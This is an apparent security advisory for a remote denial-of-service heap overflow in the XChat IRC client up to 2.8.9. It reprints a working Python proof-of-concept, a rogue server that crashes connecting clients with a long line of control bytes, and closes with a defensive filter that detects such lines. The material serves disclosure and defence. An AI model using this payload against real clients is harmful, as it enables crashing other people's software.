Release date: 2011-11-25
Updated on: 2011-11-29
Affected Systems:
XChat 2.8.9
XChat 2.8.7b
XChat 2.8.6
Description:
--------------------------------------------------------------------------------
Bugtraq id: 50820
X-Chat is a free open-source IRC client.
X-Chat has a remote denial-of-service vulnerability. Remote attackers can exploit it to crash the application, causing a denial of service (DoS).
<* Source: th3p4tri0t *>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use them at your own risk!
#!/usr/bin/python
# Exploit Title: XChat Heap Overflow DoS Proof of Concept
# Date: June 2011
# Author: th3p4tri0t
# Software Link: http://xchat.org/
# Version: <= 2.8.9
# This only works on XChat on KDE, I'm not sure about Windows.
# It has been tested on Ubuntu (failed), Kubuntu, and BackTrack 5
# It is a heap overflow and is some sort of error with X Windows
# It uses 1537 (this is the minimum) of the ascii value 20
# After this, an unknown number of any other character (did not check for special
# characters) is required to trigger a crash, presumably the payload will go here.
# th3p4tri0t
import socket
print "XChat PoC Exploit by th3p4tri0t\n"
print "Creating server ..."
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[*] Binding to socket ..."
sock.bind(('127.0.0.1', 127))
print "[*] Listening on socket ..."
sock.listen(5)
print "[*] Accepting connection ..."
(target, address) = sock.accept()
print "[*] Sending payload ..."
buffer = "hybrid7.debian.local"
buffer += chr(20) * 1537 # minimum required of this character
buffer += "A" * 4000 # anything can go here and it still works.
buffer += ":*\r\n"
target.send(buffer)
target.close()
sock.close()
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
XChat
-----
The vendor has not yet released a patch or an updated version. Users of the software should watch the vendor's homepage for the latest release:
http://xchat.org/
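With no vendor patch available, an IRC proxy or IDS rule can drop server lines shaped like the one in the PoC comments before they reach the client. The following is an added example, not part of the original advisory: the 512-byte limit is the RFC 1459 message size, while `MAX_CTRL_RUN` and all function names are assumptions chosen for illustration.

```python
# Added example: flag inbound IRC server lines shaped like the PoC's message.
import re

MAX_IRC_LINE = 512   # RFC 1459: 512 bytes per message, CRLF included
MAX_CTRL_RUN = 32    # assumed threshold; formatting codes do not repeat this much

# A run of one repeated control byte (0x00-0x1f), excluding LF and CR.
_CTRL_RUN = re.compile(rb"([\x00-\x09\x0b\x0c\x0e-\x1f])\1*")


def longest_control_run(line: bytes) -> int:
    """Length of the longest run of a single repeated control byte."""
    return max((len(m.group(0)) for m in _CTRL_RUN.finditer(line)), default=0)


def inspect_line(line: bytes) -> list:
    """Return the reasons a raw IRC line (with its CRLF) should be dropped."""
    reasons = []
    if len(line) > MAX_IRC_LINE:
        reasons.append("oversized")
    if longest_control_run(line) > MAX_CTRL_RUN:
        reasons.append("control-run")
    return reasons


def filter_stream(data: bytes):
    """Split a captured byte stream into lines and yield (line, reasons)."""
    for line in data.splitlines(keepends=True):
        yield line, inspect_line(line)


if __name__ == "__main__":
    # Constructed sample traffic: one normal server line, then a line with the
    # shape described in the PoC comments (1537 bytes of value 20, then filler).
    normal = b":irc.example.net 001 alice :Welcome to the network\r\n"
    suspect = b"hybrid7.debian.local" + bytes([20]) * 1537 + b"A" * 4000 + b":*\r\n"
    for line, reasons in filter_stream(normal + suspect):
        print(len(line), reasons or "ok")
```

Either finding alone is enough to discard the line, since a conforming server never sends a message longer than 512 bytes.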